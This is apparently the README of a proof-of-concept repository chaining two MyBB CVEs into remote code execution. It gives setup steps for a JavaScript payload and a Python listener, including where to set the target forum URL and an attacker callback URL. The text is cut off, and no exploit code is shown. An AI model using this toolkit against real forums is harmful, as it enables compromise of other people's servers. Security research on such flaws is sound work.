Mybb associate CVE-2021-27890 & CVE-2021-27889 to RCE poc
Mybb-XSS_SQL_RCE-POC
Mybb associate CVE-2021-27890 & CVE-2021-27889 to RCE poc
Before Use:
There are two files here: 1js and attack_listenpy
You should modify these two file:
1js:
modify the mybb forum url and attack url:
var bashurl = '19216892164/mybb/mybb-mybb_1825' #mybb forum url
var attack_url = '19216892165:8080/attack_succ